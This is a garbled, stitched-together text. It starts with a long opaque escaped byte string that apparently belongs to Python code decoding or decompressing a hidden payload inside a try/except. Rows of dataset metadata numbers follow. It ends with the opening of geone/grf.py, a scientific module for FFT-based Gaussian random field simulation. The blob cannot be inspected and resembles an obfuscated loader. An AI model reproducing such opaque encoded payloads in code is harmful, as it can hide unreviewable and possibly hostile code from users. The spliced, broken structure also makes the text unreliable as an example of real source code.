x95xX;\x00z"Hn[\xb0\x84\\3\xfar}\x11\xab1S\xb8"\x91\x9fi\x91\x82\xcd\xb6\x15\xc2\xda\x14\xcf\x8c\xb0\xe2|d\xaa\x9d\x1f\x9a\xae\x94\x04\xef\xb2\x1f)\xf8E\x01
\xafA\x87\xe3\x97)\xae>k.\x1f\x90a\xac\x81\x96\x1e\xf6F\xcc\x8di\xfau\x15\xb9\xd4#\x10+\xde\xfb\xab^\'\xb7\x92\\\xa7&v\x94\x9c\x05\x1b\xe3\xae\xdc\x87\x0e#9g\xb6\xf0\x830\xb8\xc5=\xfdt\x80P\x16\xc2\xd10\xa7\xccU\xe2\xd3\xb1i\x95\xab\xd1\x89\x0f\xc8\x06Cy}+\xb4pF\xcf\xf8S\xa0\xc2\xea\xaf\x82l\x1b\xfaMX.\xa4\x8c\xa9\xf8\x88^Z\xdd\xaf\xdev\xed\xb72F\x1e\xa4\xa7\xdcJ\xa0Q-U)qQh\x8a\xf3u\xed\xb3x\xda\x899\xa1\xf6\xb2:\x1aG?>\x96\xf2\xdaA<f\x92Q5,\x91\xe2a\xdd\x1f\x8agP\xa1}\xd4\xf7G\xbb,\xce=\xf9\x8df\x9bT\xa9\x8dJr\xc7y\xae\xd3\xbe\x94\xccq9\x8fCi\x80r;?\xc3\x89\xb2\xdb\xd8e\xa2(kKm]\xd4\xb4\xb7j\xb5\xc7\x1b\x18\xdaR\x82\xcc\xde\xaav\x9c\xd2|;\xde\xc7\xe4\xd5\x03\x0c\xe7$\xc7\xee^\xbe\xd0\xb3M\xf9\xfaG\xf2\x01$\xdd3\xba\x94\xb4hzw\xe6\x81\xd3\x07\xa1NhG\x82a\x16\xa0\xe4\xa9\x81\xc3\x9c~\x11m\x84\xc3oG:\x1e\xcb\xae\xd0\xe3\xab\x97\xa0q\x06g\xb1N^\x02\x88\xcf\x02\xb0\xd8\xc26\xde\xd4q\xef\x12\x1bE\x01\xb2\x17\xd0\x84\xf0\xf8 \x94\x92\xcd3:\xdd<\x95!\x97\xca\x82M\xfa\x80\x7f\x98^\xfc<\x87\xb9\x80\xca1I\xc6\xa3\xf0\x1ep\xc7_V\xa5\xc2\xc4\x9e\x0f6X\xef\xb6\x96q\x0f\xe9\xbc\xccM\xc3\x0e\x8bj\xc7SuLB\xd9\x95\xa6\xd7\x86` \xdc\x0b\xa4KP{?\xa0VB}\x85\n"}3>\xdb\x0b\xc0,5\xf9c\xdb\xa8\x92\xc7\xddC)\xa8=~\x89\xf9d\xf5\x0bV\xbdp\x81K\xb8\xcb]\xc8\xeb,\x15w\x1f(\x8fN\x0c\x91\x1aS\xf8`T 
>\x0e\x0fZ\x9bh\xdd\r^h\xdf\x9d{\xc5,\xac\xe0\xc0\xee\xf2\x1e!&$\x90uX\xedI\tS~\xb9%A\xfcZ.RE(UJ|\x89\xa0\xc1f{GKX\'\x80\xd1\xddwt\xe2o\x86H\x94\x10[\x91J6-V:\xf7\x11\xa8"\x93\xe8\\%\x01E\x1f8\xcd\xd5_\xfc\x0fu\xea&\x96\xdeO\xe1\x14`i\xd5\x1e#\x92\x8d^\xd2B\xea\x99\xbazw\xaeo\x89\xd5\xd4\xb3\xc1C]\x1b\x9d\xb5h\xdb(\x97\xce\x95\xfb\xd9\x99?\xfe>,u\xaa\xe1\xc5V\xc2\xaaK\xffh\xbe\xdb=\xc6\xd5\xb0xoUm\xa6\xff\xd3A\xb6\xd6y\xdc\xae\x0ekWI`\xd2J\xc6\xc3\x86,@\xb7\x8b~\xf7\xebk\xcb\xe7%d\xe7Mz\x18l\x10\x7f\x97BR\x13\xe2\x14\xd9\x91\xb0\\\xc8\xea\x7f\x90\xb4\xa4\x02\xbe\xd5\x92\xa1\xbb\x96b\xbbx\x832\xbaa\xec\xe6\xe5\x95\xf4\xf8\xf1\xd6\xe8\xf5\xe3\x89K\xd5\x7fd\xbf\xb2\x15!R\x04\x15N\xa9\xba\x96\x1a\xa5T\x92B\x19((K\x81X+\xb1NBLpm\x02\t\xf2\xa1\xde\xb3\x86\x85\xad\x119\xbb\xf6r\x9a\x93}\x7fTw*\x06\xe8\xd8\xcd1Wh\x89\xa3\x9a\x0f\xcfA_\x1f\xb5K\x93CS\xfe{\xa7\x84\x8e"\x06Hn\xd8>\xc31"F\x0b\xa68\xd1\xb5\xd1\xaa\xc2<\x84Bz35\x9f\xaaL\x8c$\x1b\xd7\xbe\x88\xaf\xea\xd5\x90R\xfaB\x07\x12`-\xba\xe6\xb1\xb4\xd3\x99\xa2/\xdb\x94:Z4hQ\xc0\x19=\xfe-\x03\xb5\xdb\xeb\x10v\xb8\x10\xdc\xaa\xfeb:\xec\xb4V\x8e\x89\n\x11\x02\xdc\x00\x13\xdf\xca\xbaOm\xa2=\x99!\xf4\xea!Fj\xe2\xb5\xe6\x05\xab\x8c\x191v\x04\xd5\x88\x98\x03\x93"6\'\xb9\xf8\x8d5\x96\xadg\xfa\x02\xdf-\xf4\xac\xb0\x15\xac\xdeuq\xba\xf6\xc8\xbc@\x15`~\xf6\x9f=9#cG\x86\x1b\xaa.\xb6\x14\xfc\xc8U\xb9\t=V9m[J\xda\xd5P&Z\x9a|\xc5\xfd\x99\x10\xbf\xd1h\n\xa8\xb6~\xa7\x8fn\x83\xd6\xcf\xe1\xb4\x91\xbc\x97\x015Y\x96\xc9\x99\xb6\xa4\xcd>\x01\x12\xc8\xeb\xbc\xd21\' 
\x19\xef\xa5\t\x8a\x06a\xbb0<\xe5\x9daM.\x1d\x80\x93\xab\x8b\xeb)u\xfd\xb6\xf5S\xe5\xb39\xf5\xab\x92!\x8d\x05\xd9D\\\xc74\x90\xdd\x87\xbaX\xe5\x82d4>\xe0\xec\x8e\x9a\xa6\x909P=\x99\xe6\x05\x82R\xd8\xea\xe8N\xecq\xfe\xedxY$y#\xda\x01\xd5"\xe6a\xd3\x9eM\x1e<}\xdeK\x05e\x93\xd4\xa9{\x93\xbe\xa7\x95\xf3B\x1e\x14\x0eO^4\xd5\xc1\x8d\x0e\xb9.\x84\xb9\x1f*\xdb\x8eV\x81i\x14\xdb\xd1\xd1\x98\xae\x96\xd5\xd1&\'\x8d\xf6\xf5\xac\xb6Hs$\x80[\xc63C\x1c\x94\xfe\xca\x84.\xda\xb53\xec\xc0\xd51\xfe\x0fs\xe8_\\\x1cC\xb1\t\x00he\x07`mI\xf6u\xb9\x11\xaa\xd0\x1a-\x8eE\xc0\x8b\xfe\x13\x19\x14\xcen\xda\x97\x1cQ\x13\x1c\xc2\xcb\xbf\xc8\x1c\xae{\xe0\x7f\xa3\xfe-\xd6\xd2n\xef\x05T.Pj\xd6\xc0\t\x86\xeefH\x88\'\xff$.\xfej=\xed\xa2Ji\xde\x14S\xcbum\xe2\x90E\xac\xf1x\xacfw\xfe0\xdd\x99V"\xa9f\xeawE\xf9\x07M=\xc43`\xf3=\x7f\xbe\xef+\t~\xe5\x8c7\x9f\xd3\x12\x8eWLB@h\xf1D\xef\rvl\xa3F\xbe\xcb\xa5\x03\xf0\xb8\xf0B=C\xc1\x1b\x94\x05\x88\xe1b\xf6\xbbouU\xeeY}@\x9e\xf5\xc3\xa1)D\xa8h\xb2f\xe4\xc0\xa3:1\xf9\xfaQ\xad\x98\xd2\xfa\xf7\xc0~[\xadu\xb7\x15U\x85\xe4\xd1,\x0f\xceBI\xc6e\x88&\xda\xd6Mm\xcf\xa4J\x1fkM\xa4\xa4\xd22\xa1\x8d\x01\x1bQ5\xe6\x97\xf4\xce\xfb\x7f\x0e\xca\xa0+\x90g\x03K\x13\\\xc3\x16\x0eog\xe03k\xc6\x1bu\xdb\xe1\xddh\xec\x99F\xfd\xda\x9bj3\xf3\x92z!\x95\x86\x1c\xbe\xd1\x1f\xdbl\xdc\xa7\x10A\xa2\xc2\xb6\xb8\x9d\x86\xe79\xa2\x16\xf9\x9b\x7f\xba\xd9\xd8s\xa1K\xa2\xb0\x1bz\xcd\xd8Ek\x15\xbb\x1c\xc0\x00mv\xd3L\xa8Y\x86\xcd\xca\x1f\xda\x17=N\xec\xee.\xd8\xd6\\\'R+\xdc\xeaM\x94}+\xfe"\xd6\xbe\xaa\xf0\x0f\x93\xd0\x19\x16s}#uB\x15\xc0\x84\xd9\xa9\xeb\xa9ri\xac\xb6\x81\x0e\x97vAr\xeeE\x89\x8f\xfcv^*\x94\xa2IN\xe1\xa3\x8cDfve\x8f\x08\xc1y\\\x8ex\xd3\xa6\x95\x88\x80\xc6\x0f%\xfaV(\x80(\x0b\xca\xdek\xce\x87I\'\xf7\x8e\xbbu\x1c\x87\xdanG`\t\xce\xbd\xaa\x95\x0c\x17\x90d\xb0\x12\xed\x8fn\x89jn\xc99\x0c\x9cv\xfe\x97o\xaf=J\xbe\r\xeb\x1b\x03\x93\x84\x8dF(\x03\xaan\xecZ\x1f\x05\x9f\xdd\x9f\x0c(\x8c\x06[\xd3\x01\xa2\xce0!{\xa0hE\xca\x03n\xd5\xe3\xacg0:K|c\x8e\x0f-\xd1\x06\xca\xe3a\x80\x1d\x1bWZ\x1c}\xa7\xb1\xb
5\xdf%\x8e\x97\xc5\xa8\xe4\xd8\xef\x01\xb8 \x18Jr\x012/q\x9fy\x12\xf1\'\xe1\x9b}\xf4n\xa9EZ1\x146c\xfa\xf9\xf0\xbc\x8c>\xbc\xd7\x00\xa0\x8e\x82\xac\x9eu\xfb;\xe9z\x08zt\x02\xbctA\x04.\xb9\x9cn\xc5\x08P\xda\x8e\x87\x89k\x05\xa8\xd7\xb2\x15\xd2\xa3=\xc6\nd\xedpX\xea@\x98\x0e\xf8\xe3\xd5\x86~\x9c\x1f\x0e\xec\x9f(\xfe\xae(M\xa39W\x9d\x1c\x86\xb0\xc9\x16\xa1\x10\xdd\xf9\xda#\x14\xb34x\xc0$@\xb13\x86\x8fm \xa3\xc1j\xdb&{\xe0!\xe0\xfcQ7\x17!{\x89\t\xded\xa9!r\x9d&\x7f\xaa\x82\xd6\xd5U\xc8ddI$\xc9\xc4(\x94\xd3\xebf\xf6V5ZE\xaeW\xac\xa6\x99\x87\\c]M&v\xc5DJz\x18K\x97\xa0\xe65}\x9a\xe5\x88\xe2c\x91\x9e\xe2\xb0\xfbs\x06\xa9\x87\x8b\xa6\x82\xe8\xe6@]0d\xbbs\xda\xe8\x11\xee:J\xb6\xee\xef\x8f\x1b_\xd4\xb2\xa5\x9d\xee*R\xd7\xc3\xb7\xe44\xaa\xb0\xa8\xd9r\ng\x94\xae^\xc2\xf9\xaa\x00\xd0#\xf9(L+\xee\x16\x8e\xfc\x89\xe7\x93P\xdb2:}[=\xde\xd2\x97\x00k\xa72\xec\xd5\xc1\xcd%\xbdA\x9c\x04\\\x04K_I6x:\xf0\xd6\xd4]-\xbe`\x08T(&\xea6$\x84c\xc1\xce\xc7\xc6e\x86\x13L\xbc\x85\x83\x92\x07|L\x01\xda\xe4\xc7u\xd9\xc3ZY\xcd[\xbdkb\xe1\'\xb1\xae\xe9\x90\x02"\x1c\x0e)i\x1b\x02\xed(s\x9a\xd7f\xcf\xb3U\xf6\x9a\xc5\x8e\xf9O._3\xb5\xb8,\xc6\n\x8b\xf4\x05\x11\x98\x98\xce\xbe\x0c\xe7\x19g>X\xcb\x92\x96\xfb\x80\x86Z\x1c]t\'\x1f\xd4\xff\x93\x97\xa9\xbd\x97\xb7\xaf\xaf\xeb,\xcb\xe5kR\xa8(\x99*\x1a\x9d\x00[\xa1\xd5\xad\x92O}\xea\xf0\xb3\x1b\xde\x8e\xaf\x03T\xf6F{&\xed\xf6\xa3 ,\xd7\x19\x88\xab\x865^v\x86\x8b\x0b\xb8\'\xa9/!+\x16>\x95JVY6\x809fIB|t\xdb\xfbF#\x8c\xb8\xb9[\xb0\x07\xa9\xd0\xb6\xd2\xc9~\xce\x13\x17K\xab\x15y\x93\xa8J}\x16V\xe8~\x10~\x19\x89\x93\x7f\x08=q\xd4\xe0\x90\xfb\xb1\tb\xde\xce\xbe\xe1=\x81\xce\x8c\x8d\x17\xbe\x8b\xd6\xe1p\xef\xf1\xe5\x8aX*\xcft\xed\x0c\xed\xb0\xeeow\xf3\xd5/H.C\x15\x9a2\xf4\x8c\'\xd7\xef#[a\xdc=(\xf16\xea\nDs\xd1\x19\xc2\x95\xea\xd5\x1e\xa9h\xeb\xe8xu\xa7\xb8,\x8f\xbf\xc8k\xa0 
\x8aF\xa1#m@\xcc`j\xecB\x8ar\x87\x0e7d\xc36(<\x9b\xb0\xd8>\x96\xd91\xeb\xed\xae\xb4\xc4\x98\x93\xe9\x0b\\1\x18c\xa9\x8b\x88\x9a\xd3\nm#\xca\x12\xb1:7"\x88\xf0\xe5\xf4\x98\xb7Q\xfdc\x9e\xc8\r\xa6\x8cd\x99\x18\xa4\xac\x9a\xeb-\xdd\x99\xb25{*\xdf\xca\xb2n3\xf3#\xd2\xac\xba\x94l\xa6\xfc!\xa5\xacy\x8c\xb1\x15\x81\xb6t\x8a\xfe\x99\xbf\xdc\xd7\x010\x1e\xf4\x04I|\x8e\xf2\xa4&\xc3\xed\xc9\xe8\xd5\xa2\xf6\xf9n\x13M\xca(\xf7o\xa12\xb3\xa2\x13u\xd9\xe8\'\xe9\xb2Z\x01\xfa\x88\x93r\x10o\xd6\xb0D\xb0\x9b\r\xb5\xa9\x01\x17\xc6c#?\x1d\x1f\x804\xd5q\xa5es\xa3\xfc\x02\xf9Sr0\xf1\x8fC\x06\xc5pW\xf6h\xcb!\x9c\xb3\xcav5\x80\xe9\xe4Ubuz\x15\x88u%\x01+\xc7"\x862\xe7\xe4\xdb\xc7\xaf\xbe\xf7\x86!(\xd8\x9c\x06\xf7O\x9d\xf7b\xc3\xd8o\xa3F\xf1?\xc5\x8e\xb7\x0cZ\xdd\x03\\-\x1d\x0e\x83\xf9\xcb\xc0y\xc6g\x9c\x1eVMH\xac\xd8\xf1\x8d\xd0e\xf5\xc3\xbdo\x93\x1a\x8f\xb4\xaa4\xe5@\xb3\xa678\xe5\xd1\x95\xa8\\\xaa\x94\x89\x7f\x1f}\xfd\x8f\xb0\xcd\xe9\xc8Vp\x92\x98--p\xcd^Z\xfd\x84\xdd\xabm\xf5\xf8S\x89\x80v\xb2\x11\xed\xaf\xb1Y\xadn\r\t$<R\xfc\xea1n\xd9\xd8\xec\xaa\r\xd5\x9d\xce\x8d-(\x8e\xa7JC\xb7sF\xf2&2\xa6^\x8cP~cA\xf4\xe5S\x83\x1e\xa5\xabf\xfa\x96{\xb0\x11\xcb\xd8\xf0d\xf6/\x12e\xb2\xa7\x13\xb2V)\r\xccvh\x1c4\xdb\x1b\xe7\x8b:\x87E\xd4\x99gk\x07,sh_u\xea\x86\xc7\xc2\xa9\xd6\x12u\x1a\xcd\xdc\r\xee\xa9J\xed\xac{Eq5\x12x\x1e\x85\xb8\xb0]\xde<G\xfb\x01\xe0\xbb\xae\xe2^\xf8DGJy\x01\xa9\x94\xad~\x85\xd6\xa9\xf0\xa3\xdc\x14\x90\xe6P\xa7\x95\x8c\x87\xa2\xfa\xb5\x12\x02U\xc2\x05\xb0\x07n\xc6GoR_U\xb6\xa0I\x87kQ\x97\x92\x0f&<\xbc\x08\xaf\xc3\xd9\x1dj&\x13\x82"4!rz_|\xfa\xcb\x99\x9f\x1a\xc6\x9b\xa0\xaf>\xd9|\xf60@\xebp\xa7\x9d\xbe\x1c\xbf\x94\xee\x02\xbf\x12\xce\xdfV-&\xa7\x90A\x1f%\x05\xbc^\x84\\\x91\xba\xfbED,\x94\x98\xd9\x9c\x98tU\x17\x14F\x03R\xa8\xc6\xfb\xb0bT?Y\xf8\'A\xa2\xab\xd5\xb3+\x8fDZ\xce\xc4Tp\xef\xaa\x17*\xc0e"5Jd\xe2A0\xdag\xe2\x0f\xf4=\xae\xfc\xad,\xa2\xec\xb2|\x03/\xa0{\xc5\xd2v\xed?&\xb1E\x98@\x95\x06\xfa\xe8bxup\xd7\xbf9\xee(1\xc8\x9c\x91r1\xda\x82\xa9U\x96\xf8\xdc\xdb\xdb\'\xea\xbaK\xe5Y\x05%\
x00\x15[\x98i42\xc9\xb0\x03j\xc8\xb5\x9ff3\x90\x81\x88\x03\xfe\xd21\xc0$\n\xa3\x8e\x89\t\x99x8\xec;\x93\xf2\x8fX\xd9\xdfg\xdf\xa0\x88.~0t^N\xae\xc6\xd5\xbd\xe9`\x97\xaeB\x8fU&s=\xfe\xae\xcf6\xa1\x9f \xd2\x82\x1c\xd4\xe7\x9e \x8e\xc2\xb0^\x1a\xdbx\xea\xeb\x0eV2\xf2\xdb5\xcdkx\xed\x8b\xe0\xd3(o\xfb\xcef~\xfd\xc2\xe7H\xff\xa1\xf6V7\x03\xa3\xb8J\xefw{\x89O\xcc\xc3l\xeb\xf7:\x16\x98dvY\xa9\x10N3\xa96Y}%\x96x+wY\xa3\x8c3^\xbf\xc0\xf7&\xc6\xed\x0f\xae\xcf\xc4\xc1$>\xb0(\x0bm\xb14\xf7V\x1dL\t?\xf8\xfe\x13l\x18\xb5\xaae\x8f*\xdf\xde\xba\xd4S\x86\x88>\x13\xf1h:/\x8dc\x1d\n\xea2\x98\x89pC\x00w\x84\xb1\x9fK\x8e\xa4_\x87\x97\xa0\x0c\'t:s\xc8\xe7\xe0\x9c\x05I:\xf9P\x03\xe4\x8dm1=\xac\x95\xadh\x11\xeb{\x8f\x83\xa1\x92\xf2H\xc7\xd9&B\x82\x8b\xc5\xdd\x88\x83\xb9\x0blcuh-\x83~\xe9\xbcV\xedL{MT\x0c>dx\xde{\xac@\x7fC2)\xd6\xa6\xc7\xfa\xaa\xcd\xa86e\xea+/\x85n\xa8\x83\xed+\xd0\x1b>\x9dj\xc8\x005\x84\xb5X\xa5\xb2\xb9\x7f\xda\xf1q~\x89Y\x19\x88^\x16\xf1\x86\x1e\x15p\xd3\xf3\x96TV\x80\x8dN\xc4\x03.L\x16\xe1\x17\x14jC`R\xc1\xa2\x1d\xc9\xc9E\xe4|\xd7\xa7\xa8M\xbd!\xf2\xbd\x13\xf0\xda\x90Hw\xb7|=b\xcb\x9bD\xd6_\x02\x8b\xf3\xcami\x85\xc2\x1f\xba1\xab\xe9\x88\x89\xfbE\xc4J\x9e\xcd\x1f\xc3\xa6T\x01\xedD;+\x06\xaf\xb5T6\x9d\xbc\x1e28\xc4\xe5\x05N\x8f\xf6bU\x0e\x85\xbc\xfc!\x15\x92\xcd\xa5\x96*[\x9d![+cB\x97J`\xae\xd8\xdd\x16\x9e5\xa3\tU\x85\xe5\xce\x90\x0b\xfaj\x02\x0f 
\x08\x18]\xf6I\xe3/\xa9N\x9d\x1b\x11\xb2\x08\x82\x88\x1a\x9c\x02>\x8bF}\xfa\xee\xc1\xcf0k\x8b\xdc\x9fMu\xae5\xc4a\tR\xd2~\xf0\xe7\xed\xd6\x1f\xf0\xf1\x92\x9d\x7f\xaem\xf9}E\x03\x7fez\xb0/\r-q\x1dc\ro9\x9b\xc3{F\xcf%L\xe1\xca\xe2M\xbf&\xfb\xf8~\x13\x84\xc54\xa8\xfb\xf8<&<kw2=\xe5/\xe7\x8e\xd4\x9f\x95\xb6\xc55\x1f6\x03\xd6\xf1\xb9\xf0\xfa\xdd\xc9\x05w\x1de\xf5r\xf4\x17\x8b\x12#\x83\xb7ss?f\xd5\x1c\ngb)\xe6\xef\x16\x074\xa5\xa2\xe7\xf0\xb9\xa7U/\xcc\x15\x00\\o\xe3M\x82\xbf\x8bG\x88#]\x00Z\xbeaD\xef:a\xa9\xca|Z\x8af\xa7\xfb%\nf\x936\x9c\x95\x0f\xd5a\xeat\x1f\x19\xe9\xeddt\x89\xec\xae\xd9\x1c\x0b\xb7\xb4\xfc\xce\x91\xfbt!\xc0<\xc3\x05\x00\xe7ifPjB\x03SJ\xd3\xd1DO5\xf1\xa3\x0cA7~dC\x91\x88\x0f\xf3Q\xba\x99H\x0e\xcb\x88\xfd\x0eL\xd0\xef\xfe\xe6\xa0\xd4iNq\x9a\x91\x7fog\xf2z)\x1a\xaaQ\x12j0\x1e6\xc1&+;^\xd1\x1d\x1f\xf9\xa5\xc12a\xf4O\x00\r=\xe8\xe5\x8a\xd5RSp#*6~\x04\xd7\xe8\nn6NIxp\xa7\x08\x91\xf1\x9c\xa4\xc7O\xcb9-\xfd\x97\x89\xfay\x13]\xcf\xf3\rJ\x80f:_LFf\xe7A\xd1x\x0e\xe5\xa3\xf9\x97\xda\xde\r\xe3\xe2\x94e\xe1\xb44\xda`\xa8\x81\x12#\x922\x99\xa21\xb9\x0eL7\xbe-dT\xadO\xea\xb9\xdd\xf8w\x17B\xc4:\x19\xe4D\xe2ld\x0f\xa8\xc1\x90\xed$\xd0\xe3\x81\x14#l\x9e\xc1\x85\x94\x8bD\xe3lc-^T:\x8b\ro\x9d\xbee\x91\xf1\xfc\x8d\xa9j\x8a\xb0\xc3\xf1\xdd\x07jP\xf3;0ra\x95\xc5f\xc0\x0e\x0b\x05\x97\x17\x0fY\x9a=\x12I\x99K\xa3`$Ut\xdb74\xb4|\x81j&Y\xd0xP\xfa2\x0f\x95\xcb\x15j\xcb\x06r\x9f\xc2\xc8\xf2\xa1!\xe1\xd9\xe4Z\xac\xf2\xf5M59\x0b\xb0\x19\x19\x1b)\xc9l\xa9o\xa7\xca\xf7\xf93\xcb\xe1\x8f\xb7!Y\xfd\xe5\x85\xc8\x1eD\x8emv\xe1\xc2K\xa0\xc8\xf72\x13^\xd1\xff\x8c\xee\xf6b\x1a\xbf\xce\x8a\x13\xcc\xc6\'B\xb3\x1d\xe7\xd7\xd8\xf9"5\xe6\xd8\x9c\xe3\x0c\xb0O\xcb\x1eZQetx-OD\xa4\x89\xbb{\xbe\x7f\xdd\xcb\x1b\xea\x14\x11\xc7\x0eW\xaeCC\xc3q\xdf\x86\xce\x96\xdcmo]\x8c\xbc\x0e^^\x8c\xfd\xa3@\x88\x894`\x89t2\xe7f\xaf\x86!K\x02\xefw\x1f\xef\xd9Zy\xb0\x96\x92\x8a\xc1A\x11a\xa2#\xb3\x9f\xee\xae\xe0\xa3k6\x8d\xe3~$\n\xc7\x1f\xf9\xfcb,Q.D\xfd\xef\xb6\xbe\xf0\xf3/\x1c\xad\xbe[{\x84\x7f\x082{\x05\xceDT\xf6\xcf\x
bfz\xb7\x85\x0c\xa0\x06\x7f6\xd1\xe9\x08\xa8\xc7\x05\xff\x1b\xccM\x9f\x1a\xcc?\xa2Q@\xaah\xb2\xf0\x1f1\xb0\xefB&\xdc\x02\xb3\x8c\xbe4LS)\xd6\x1e}\xd9\xe2\xdf\xceBn\xdd5_d\x9f,\xe6\xaf\t\xac\x9f\xe0o\xfc\xcf\xff\xe8\xfc+6z\x0f\xbc\xc8jE\xdfL$_y\xcb\x17N\x96Y\xb3/\x84A\xe7*\x9a\x10\xe8\r\x1a\xfbeL\xb2%\xf6\xdf\x96\x048\xa6\x94]]\xd8FV|N44\xd6\x8aD\xae\xbe\xbb$+*7\xf18\x01k\xde)\xab\x94\x1e\x94V\xf3S]\xac\xb0t\xb2\\\xeb.\xc2\x15\xb8Z;\x9b:99<\xe9\xb3\x97}\x12E\x99\xbe\'2\x90P"e\xebS\x97\xa7\x01\xe5\xbe_\x9f\x9cn\xd7{\xfaciw\x0e\xea\xd3fgG\x7fN\xb7\xaev\x8e\xc2\x7f_\xed\xed\x84_\x92:\xaf\xf2\'9y\xef\xb0n}\xfdt\xd0\xba\xe6p\xff\xe8\xc4\x9d\xfa?\x9fM\xdd\xddBGg;\x87\x07\xfaY\x13~Avt\xb2sp\x16\xc0!\'\x14~E\xe1\x7f\xff\xef\x8f\xe15\xbbs\xe6\xe5\xf0}\xbe\xde?l\xcf\xf7\xdc\x98\x08(\xf7?{\xaa\x8b\xa7\xff=\x96~\x8a*\x151s\xa9\x81\x8f\x14\x1e\x1c\x81]A]\x1eg\xb4\xf7_\xe3\xa3\'O\x9e\xfc\x9f\xe3\xbb\xef\xbb\xff\x10}\xf5i\x9f}\xc9w\xfe\xb8{x\xff5_\xdb\xdb\xbe\x87O\xfe\x07\'\xd15FqS\x01\x00')))
except Exception as b:
print(f'Error for : {b} ')
| 9,717.916667
| 116,449
| 0.734408
| 26,740
| 116,615
| 3.197046
| 0.194764
| 0.000421
| 0.000211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230032
| 0.001646
| 116,615
| 11
| 116,450
| 10,601.363636
| 0.504265
| 0.000472
| 0
| 0
| 0
| 19
| 0.680305
| 0.678503
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c9d6b69e9aac71a6f7a1f884a2f094a03e63dd2
| 155,550
|
py
|
Python
|
geone/grf.py
|
pjuda/geone
|
5a9e5d99702cdccb11ab825ea9b4caa90f3ba111
|
[
"BSD-4-Clause-UC"
] | null | null | null |
geone/grf.py
|
pjuda/geone
|
5a9e5d99702cdccb11ab825ea9b4caa90f3ba111
|
[
"BSD-4-Clause-UC"
] | null | null | null |
geone/grf.py
|
pjuda/geone
|
5a9e5d99702cdccb11ab825ea9b4caa90f3ba111
|
[
"BSD-4-Clause-UC"
] | null | null | null |
#!/usr/bin/python3
#-*- coding: utf-8 -*-
"""
Python module: 'grf.py'
author: Julien Straubhaar
date: jan-2018
Module for gaussian random fields (GRF) simulations in 1D, 2D and 3D,
based on Fast Fourier Transform (FFT).
"""
import numpy as np
# from geone import covModel as gcm # not necessary
# ----------------------------------------------------------------------------
def extension_min(r, n, s=1.):
    """
    Compute the minimal extension of a grid dimension (in a given direction)
    so that a GRF simulated via circulant embedding reproduces the covariance
    model appropriately along that direction.

    :param r: (float) range (max) along the considered direction
    :param n: (int) dimension (number of cells) in the considered direction
    :param s: (float) cell size in the considered direction
    :return: (int) appropriate extension in number of cells
    """
    # Number of cells needed to cover the correlation range.
    cells_for_range = int(np.ceil(r / s))
    # Extra cells required when the range exceeds the current dimension,
    # plus (cells_for_range - 1) to avoid spurious correlation across
    # opposite borders of the periodic embedding.
    shortfall = max(cells_for_range - n, 0)
    return shortfall + cells_for_range - 1
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def grf1D(cov_model, dimension, spacing, origin=0.,
nreal=1, mean=0, var=None,
x=None, v=None,
extensionMin=None, crop=True,
method=3, conditioningMethod=2,
measureErrVar=0., tolInvKappa=1.e-10,
printInfo=True):
"""
Generates gaussian random fields (GRF) in 1D via FFT.
The GRFs:
- are generated using the given covariance model / function,
- have specified mean (mean) and variance (var), which can be non stationary
- are conditioned to location x with value v
Notes:
1) For reproducing covariance model, the dimension of GRF should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large conditional simulations with large data set:
- conditioningMethod should be set to 2 for using FFT in conditioning step
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix for conditioning locations (solving linear system)
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (1-dimensional array or float) are 1D-lag(s)
(CovModel1D class) covariance model in 1D, see
definition of the class in module geone.covModel
:param dimension: (int) nx, number of cells
:param spacing: (float) dx, spacing between two adjacent cells
:param origin: (float) ox, origin of the 1D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx values (reshaped if needed)
:param x: (1-dimensional array or float or None) coordinate of
conditioning points (None for unconditional GRF)
:param v: (1-dimensional array or float or None) value at
conditioning points (same type as x)
:param extensionMin: (int) minimal extension in nodes for embedding (see above)
None for default (automatically computed, based
on the range if covariance model class is given
as first argument)
:param crop: (bool) indicates if the extended generated field will
be cropped to original dimension; note that no cropping
is not valid with conditioning or non stationary mean
or variance
:param method: (int) indicates which method is used to generate
unconditional simulations; for each method the DFT "lam"
of the circulant embedding of the covariance matrix is
used, and periodic and stationary GRFs are generated;
possible values:
1: method A:
generate one GRF Z as follows:
- generate one real gaussian white noise W
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
2: method B:
generate one GRF Z as follows:
- generate directly X (of method A)
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
3: method C:
generate two independent GRFs Z1, Z2 as follows:
- generate two independant real gaussian white
noises W1, W2 and set W = W1 + i * W2
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z,
and set Z1 = Re(Z), Z2 = Im(Z)
note: if nreal is odd, the last field is
generated using method A
:param conditioningMethod:
(int) indicates which method is used to update simulation
for accounting conditioning data.
Let
A: index of conditioning nodes
B: index of non-conditioning nodes
Zobs: vector of values of the unconditional
simulation Z at conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, an unconditional simulation Z is updated
into a conditional simulation ZCond as follows:
Let
ZCond[A] = Zobs
